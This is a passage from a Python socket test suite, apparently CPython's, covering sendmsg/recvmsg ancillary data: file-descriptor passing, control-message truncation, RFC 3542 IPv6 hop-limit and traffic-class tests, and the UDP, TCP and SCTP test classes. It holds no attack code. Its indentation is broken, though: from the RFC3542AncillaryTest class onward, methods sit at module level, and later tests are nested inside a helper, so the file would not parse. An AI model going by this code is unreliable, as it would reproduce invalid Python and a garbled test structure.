                                            socket.SCM_RIGHTS,
                                            b"")])

    def testFDPassPartialInt(self):
        # Try to pass a truncated FD array.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), 10240)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
        self.assertLessEqual(len(ancdata), 1)
        for cmsg_level, cmsg_type, cmsg_data in ancdata:
            self.assertEqual(cmsg_level, socket.SOL_SOCKET)
            self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
            # Whatever arrived must be shorter than one int.
            self.assertLess(len(cmsg_data), SIZEOF_INT)

    def _testFDPassPartialInt(self):
        self.sendAncillaryIfPossible(
            MSG,
            [(socket.SOL_SOCKET,
              socket.SCM_RIGHTS,
              array.array("i", [self.badfd]).tobytes()[:-1])])

    @requireAttrs(socket, "CMSG_SPACE")
    def testFDPassPartialIntInMiddle(self):
        # Try to pass two FD arrays, the first of which is truncated.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), 10240)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
        self.assertLessEqual(len(ancdata), 2)
        fds = array.array("i")
        # Arrays may have been combined in a single control message
        for cmsg_level, cmsg_type, cmsg_data in ancdata:
            self.assertEqual(cmsg_level, socket.SOL_SOCKET)
            self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
            fds.frombytes(cmsg_data[:
                    len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
        self.assertLessEqual(len(fds), 2)
        self.checkFDs(fds)

    @testFDPassPartialIntInMiddle.client_skip
    def _testFDPassPartialIntInMiddle(self):
        fd0, fd1 = self.newFDs(2)
        self.sendAncillaryIfPossible(
            MSG,
            [(socket.SOL_SOCKET,
              socket.SCM_RIGHTS,
              array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
             (socket.SOL_SOCKET,
              socket.SCM_RIGHTS,
              array.array("i", [fd1]))])

    def checkTruncatedHeader(self, result, ignoreflags=0):
        # Check that no ancillary data items are returned when data is
        # truncated inside the cmsghdr structure.
        msg, ancdata, flags, addr = result
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
                        ignore=ignoreflags)

    def testCmsgTruncNoBufSize(self):
        # Check that no ancillary data is received when no buffer size
        # is specified.
        self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
                                  # BSD seems to set MSG_CTRUNC only
                                  # if an item has been partially
                                  # received.
                                  ignoreflags=socket.MSG_CTRUNC)

    def _testCmsgTruncNoBufSize(self):
        self.createAndSendFDs(1)

    def testCmsgTrunc0(self):
        # Check that no ancillary data is received when buffer size is 0.
        self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
                                  ignoreflags=socket.MSG_CTRUNC)

    def _testCmsgTrunc0(self):
        self.createAndSendFDs(1)

    # Check that no ancillary data is returned for various non-zero
    # (but still too small) buffer sizes.

    def testCmsgTrunc1(self):
        self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))

    def _testCmsgTrunc1(self):
        self.createAndSendFDs(1)

    def testCmsgTrunc2Int(self):
        # The cmsghdr structure has at least three members, two of
        # which are ints, so we still shouldn't see any ancillary
        # data.
        self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
                                                 SIZEOF_INT * 2))

    def _testCmsgTrunc2Int(self):
        self.createAndSendFDs(1)

    def testCmsgTruncLen0Minus1(self):
        self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
                                                 socket.CMSG_LEN(0) - 1))

    def _testCmsgTruncLen0Minus1(self):
        self.createAndSendFDs(1)

    # The following tests try to truncate the control message in the
    # middle of the FD array.

    def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
        # Check that file descriptor data is truncated to between
        # mindata and maxdata bytes when received with buffer size
        # ancbuf, and that any complete file descriptor numbers are
        # valid.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), ancbuf)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)

        if mindata == 0 and ancdata == []:
            return
        self.assertEqual(len(ancdata), 1)
        cmsg_level, cmsg_type, cmsg_data = ancdata[0]
        self.assertEqual(cmsg_level, socket.SOL_SOCKET)
        self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
        self.assertGreaterEqual(len(cmsg_data), mindata)
        self.assertLessEqual(len(cmsg_data), maxdata)
        # Only complete FDs can be checked against their files.
        fds = array.array("i")
        fds.frombytes(cmsg_data[:
                len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
        self.checkFDs(fds)

    def testCmsgTruncLen0(self):
        self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)

    def _testCmsgTruncLen0(self):
        self.createAndSendFDs(1)

    def testCmsgTruncLen0Plus1(self):
        self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)

    def _testCmsgTruncLen0Plus1(self):
        self.createAndSendFDs(2)

    def testCmsgTruncLen1(self):
        self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
                                 maxdata=SIZEOF_INT)

    def _testCmsgTruncLen1(self):
        self.createAndSendFDs(2)

    def testCmsgTruncLen2Minus1(self):
        self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
                                 maxdata=(2 * SIZEOF_INT) - 1)

    def _testCmsgTruncLen2Minus1(self):
        self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
    """Convert an ancillary-data list to a {(level, type): data} dict.

    Fails the test if any (cmsg_level, cmsg_type) pair occurs more
    than once in ancdata.
    """
    mapping = {}
    for cmsg_level, cmsg_type, cmsg_data in ancdata:
        key = (cmsg_level, cmsg_type)
        self.assertNotIn(key, mapping)
        mapping[key] = cmsg_data
    return mapping
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
    # Receive hop limit into ancbufsize bytes of ancillary data
    # space.  Check that data is MSG, ancillary data is not
    # truncated (but ignore any flags in ignoreflags), and hop
    # limit is between 0 and maxhop inclusive.
    self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                              socket.IPV6_RECVHOPLIMIT, 1)
    # Signal the client that ancillary-data reception is now enabled.
    self.misc_event.set()
    msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                               len(MSG), ancbufsize)

    self.assertEqual(msg, MSG)
    self.checkRecvmsgAddress(addr, self.cli_addr)
    self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
                    ignore=ignoreflags)

    # Exactly one IPV6_HOPLIMIT item holding one int is expected.
    self.assertEqual(len(ancdata), 1)
    self.assertIsInstance(ancdata[0], tuple)
    cmsg_level, cmsg_type, cmsg_data = ancdata[0]
    self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
    self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
    self.assertIsInstance(cmsg_data, bytes)
    self.assertEqual(len(cmsg_data), SIZEOF_INT)
    a = array.array("i")
    a.frombytes(cmsg_data)
    self.assertGreaterEqual(a[0], 0)
    self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
    # Test receiving the packet hop limit as ancillary data.
    # Server side; paired with _testRecvHopLimit on the client.
    self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
    # Need to wait until server has asked to receive ancillary
    # data, as implementations are not required to buffer it
    # otherwise.
    self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
    self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
    # Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
    self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
    # Client side: wait until the server has enabled ancillary-data
    # reception, then send the message.
    self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
    self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
    # Test setting hop limit on outgoing packet and receiving it
    # at the other end.
    self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
    # Client side: wait for the server, then send MSG with the hop
    # limit attached as ancillary data.
    self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
    self.assertEqual(
        self.sendmsgToServer([MSG],
                             [(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
                               array.array("i", [self.hop_limit]))]),
        len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
                                 ignoreflags=0):
    # Receive traffic class and hop limit into ancbufsize bytes of
    # ancillary data space.  Check that data is MSG, ancillary
    # data is not truncated (but ignore any flags in ignoreflags),
    # and traffic class and hop limit are in range (hop limit no
    # more than maxhop).
    self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                              socket.IPV6_RECVHOPLIMIT, 1)
    self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                              socket.IPV6_RECVTCLASS, 1)
    # Signal the client that ancillary-data reception is now enabled.
    self.misc_event.set()
    msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                               len(MSG), ancbufsize)

    self.assertEqual(msg, MSG)
    self.checkRecvmsgAddress(addr, self.cli_addr)
    self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
                    ignore=ignoreflags)
    self.assertEqual(len(ancdata), 2)
    ancmap = self.ancillaryMapping(ancdata)

    # Traffic class: one int in [0, 255].
    tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
    self.assertEqual(len(tcdata), SIZEOF_INT)
    a = array.array("i")
    a.frombytes(tcdata)
    self.assertGreaterEqual(a[0], 0)
    self.assertLessEqual(a[0], 255)

    # Hop limit: one int in [0, maxhop].
    hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
    self.assertEqual(len(hldata), SIZEOF_INT)
    a = array.array("i")
    a.frombytes(hldata)
    self.assertGreaterEqual(a[0], 0)
    self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
              "IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
    # Test receiving traffic class and hop limit as ancillary data.
    self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
    # Client side: wait for the server to enable reception, then send.
    self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
    self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
              "IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
    # Test receiving traffic class and hop limit, using
    # CMSG_SPACE() to calculate buffer size.
    self.checkTrafficClassAndHopLimit(
        ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
    # Client side: wait for the server to enable reception, then send.
    self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
    self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
              "IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
    # Test setting traffic class and hop limit on outgoing packet,
    # and receiving them at the other end.
    self.checkTrafficClassAndHopLimit(ancbufsize=10240,
                                      maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
    # Client side: send MSG with both traffic class and hop limit
    # attached as ancillary data items.
    self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
    self.assertEqual(
        self.sendmsgToServer([MSG],
                             [(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
                               array.array("i", [self.traffic_class])),
                              (socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
                               array.array("i", [self.hop_limit]))]),
        len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
              "IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
    # Try to send ancillary data with first item one byte too
    # long.  Fall back to sending with correct size if this fails,
    # and check that second item was handled correctly.
    self.checkTrafficClassAndHopLimit(ancbufsize=10240,
                                      maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
    # Client side: first try sending with an over-long first item;
    # if the OS rejects it, retry with correctly-sized data.
    self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
    try:
        nbytes = self.sendmsgToServer(
            [MSG],
            [(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
              array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
             (socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
              array.array("i", [self.hop_limit]))])
    except OSError as e:
        # Check that it was the system call that failed.
        self.assertIsInstance(e.errno, int)
        nbytes = self.sendmsgToServer(
            [MSG],
            [(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
              array.array("i", [self.traffic_class])),
             (socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
              array.array("i", [self.hop_limit]))])
    self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
    # Receive hop limit into ancbufsize bytes of ancillary data
    # space, which should be too small to contain the ancillary
    # data header (if ancbufsize is None, pass no second argument
    # to recvmsg()).  Check that data is MSG, MSG_CTRUNC is set
    # (unless included in ignoreflags), and no ancillary data is
    # returned.
    self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                              socket.IPV6_RECVHOPLIMIT, 1)
    # Signal the client that ancillary-data reception is now enabled.
    self.misc_event.set()
    args = () if ancbufsize is None else (ancbufsize,)
    msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                               len(MSG), *args)

    self.assertEqual(msg, MSG)
    self.checkRecvmsgAddress(addr, self.cli_addr)
    self.assertEqual(ancdata, [])
    self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
                    ignore=ignoreflags)
    @requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
    def testCmsgTruncNoBufSize(self):
        # Check that no ancillary data is received when no ancillary
        # buffer size is provided.
        self.checkHopLimitTruncatedHeader(ancbufsize=None,
                                          # BSD seems to set
                                          # MSG_CTRUNC only if an item
                                          # has been partially
                                          # received.
                                          ignoreflags=socket.MSG_CTRUNC)
    @testCmsgTruncNoBufSize.client_skip
    def _testCmsgTruncNoBufSize(self):
        # Client side: wait for server setup, then send MSG.
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)
    @requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
    def testSingleCmsgTrunc0(self):
        # Check that no ancillary data is received when ancillary
        # buffer size is zero.
        self.checkHopLimitTruncatedHeader(ancbufsize=0,
                                          ignoreflags=socket.MSG_CTRUNC)
    @testSingleCmsgTrunc0.client_skip
    def _testSingleCmsgTrunc0(self):
        # Client side: wait for server setup, then send MSG.
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)
    # Check that no ancillary data is returned for various non-zero
    # (but still too small) buffer sizes.
    @requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
    def testSingleCmsgTrunc1(self):
        # One byte of ancillary space: too small for a cmsg header.
        self.checkHopLimitTruncatedHeader(ancbufsize=1)
    @testSingleCmsgTrunc1.client_skip
    def _testSingleCmsgTrunc1(self):
        # Client side: wait for server setup, then send MSG.
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)
    @requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
    def testSingleCmsgTrunc2Int(self):
        # Two ints of ancillary space: still smaller than a full
        # cmsg header on common platforms.
        self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
    @testSingleCmsgTrunc2Int.client_skip
    def _testSingleCmsgTrunc2Int(self):
        # Client side: wait for server setup, then send MSG.
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)
    @requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
    def testSingleCmsgTruncLen0Minus1(self):
        # One byte short of the space needed for a zero-length item's
        # header.
        self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
    @testSingleCmsgTruncLen0Minus1.client_skip
    def _testSingleCmsgTruncLen0Minus1(self):
        # Client side: wait for server setup, then send MSG.
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)
    @requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
    def testSingleCmsgTruncInData(self):
        # Test truncation of a control message inside its associated
        # data.  The message may be returned with its data truncated,
        # or not returned at all.
        self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                                  socket.IPV6_RECVHOPLIMIT, 1)
        # Unblock the client sender.
        self.misc_event.set()
        # Buffer is one byte short of holding the int payload.
        msg, ancdata, flags, addr = self.doRecvmsg(
            self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
        # At most one (possibly truncated) item may come back.
        self.assertLessEqual(len(ancdata), 1)
        if ancdata:
            cmsg_level, cmsg_type, cmsg_data = ancdata[0]
            self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
            self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
            self.assertLess(len(cmsg_data), SIZEOF_INT)
    @testSingleCmsgTruncInData.client_skip
    def _testSingleCmsgTruncInData(self):
        # Client side: wait for server setup, then send MSG.
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)
    def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
        # Receive traffic class and hop limit into ancbufsize bytes of
        # ancillary data space, which should be large enough to
        # contain the first item, but too small to contain the header
        # of the second.  Check that data is MSG, MSG_CTRUNC is set
        # (unless included in ignoreflags), and only one ancillary
        # data item is returned.
        self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                                  socket.IPV6_RECVHOPLIMIT, 1)
        self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                                  socket.IPV6_RECVTCLASS, 1)
        # Unblock the client sender.
        self.misc_event.set()
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), ancbufsize)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
                        ignore=ignoreflags)
        self.assertEqual(len(ancdata), 1)
        # Either item may arrive first; only its well-formedness and
        # value range (0..255) are checked.
        cmsg_level, cmsg_type, cmsg_data = ancdata[0]
        self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
        self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
        self.assertEqual(len(cmsg_data), SIZEOF_INT)
        a = array.array("i")
        a.frombytes(cmsg_data)
        self.assertGreaterEqual(a[0], 0)
        self.assertLessEqual(a[0], 255)
    # Try the above test with various buffer sizes.
    @requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
                  "IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testSecondCmsgTrunc0(self):
        # Exactly enough space for the first item, none for the second.
        self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
                                        ignoreflags=socket.MSG_CTRUNC)
    @testSecondCmsgTrunc0.client_skip
    def _testSecondCmsgTrunc0(self):
        # Client side: wait for server setup, then send MSG.
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)
    @requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
                  "IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testSecondCmsgTrunc1(self):
        # One spare byte after the first item.
        self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
    @testSecondCmsgTrunc1.client_skip
    def _testSecondCmsgTrunc1(self):
        # Client side: wait for server setup, then send MSG.
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)
    @requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
                  "IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testSecondCmsgTrunc2Int(self):
        # Two spare ints after the first item, still short of a header.
        self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
                                        2 * SIZEOF_INT)
    @testSecondCmsgTrunc2Int.client_skip
    def _testSecondCmsgTrunc2Int(self):
        # Client side: wait for server setup, then send MSG.
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)
    @requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
                  "IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testSecondCmsgTruncLen0Minus1(self):
        # One byte short of a zero-length second item's header.
        self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
                                        socket.CMSG_LEN(0) - 1)
    @testSecondCmsgTruncLen0Minus1.client_skip
    def _testSecondCmsgTruncLen0Minus1(self):
        # Client side: wait for server setup, then send MSG.
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)
    @requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
                  "IPV6_RECVTCLASS", "IPV6_TCLASS")
    # NOTE(review): "Secomd" is a long-standing typo for "Second";
    # renaming would change the test id and break the paired
    # client_skip decorator below, so it is left as-is.
    def testSecomdCmsgTruncInData(self):
        # Test truncation of the second of two control messages inside
        # its associated data.
        self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                                  socket.IPV6_RECVHOPLIMIT, 1)
        self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
                                  socket.IPV6_RECVTCLASS, 1)
        # Unblock the client sender.
        self.misc_event.set()
        # Full space for the first item, one byte short for the second.
        msg, ancdata, flags, addr = self.doRecvmsg(
            self.serv_sock, len(MSG),
            socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
        # Track which of the two expected types have been seen;
        # remove() raises KeyError on a duplicate or unexpected type.
        cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
        cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
        self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
        cmsg_types.remove(cmsg_type)
        self.assertEqual(len(cmsg_data), SIZEOF_INT)
        a = array.array("i")
        a.frombytes(cmsg_data)
        self.assertGreaterEqual(a[0], 0)
        self.assertLessEqual(a[0], 255)
        # The second item, if present at all, must be truncated.
        if ancdata:
            cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
            self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
            cmsg_types.remove(cmsg_type)
            self.assertLess(len(cmsg_data), SIZEOF_INT)
        self.assertEqual(ancdata, [])
    @testSecomdCmsgTruncInData.client_skip
    def _testSecomdCmsgTruncInData(self):
        # Client side: wait for server setup, then send MSG.
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
        self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
# UDP (IPv4): combine the datagram-flags behaviour, connectionless
# helpers, and the threaded client/server harness over a UDP socket.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
                             SendrecvmsgConnectionlessBase,
                             ThreadedSocketTestMixin, UDPTestBase):
    pass
# The three classes below run the generic sendmsg()/recvmsg()/
# recvmsg_into() test suites over the UDP base, each guarded by the
# availability of the corresponding socket method.
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
    pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
    pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
    pass
# UDP over IPv6: same matrix as the IPv4 UDP classes above, plus the
# RFC 3542 ancillary-data suites, all additionally guarded on IPv6
# support being available.
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
                              SendrecvmsgConnectionlessBase,
                              ThreadedSocketTestMixin, UDP6TestBase):
    def checkRecvmsgAddress(self, addr1, addr2):
        # Called to compare the received address with the address of
        # the peer, ignoring scope ID
        self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
    pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
    pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
    pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
                                      SendrecvmsgUDP6TestBase):
    pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
                                          RFC3542AncillaryTest,
                                          SendrecvmsgUDP6TestBase):
    pass
# TCP: run the generic suites (plus the stream-specific recvmsg tests)
# over a connected TCP client/server pair.
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
                             ConnectedStreamTestMixin, TCPTestBase):
    pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
    pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
                     SendrecvmsgTCPTestBase):
    pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
                         SendrecvmsgTCPTestBase):
    pass
# SCTP (stream mode): same matrix as TCP, guarded on SCTP socket
# support being present on the platform.
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
                                    SendrecvmsgConnectedBase,
                                    ConnectedStreamTestMixin, SCTPStreamBase):
    pass
@requireAttrs(socket.socket, "sendmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
    pass
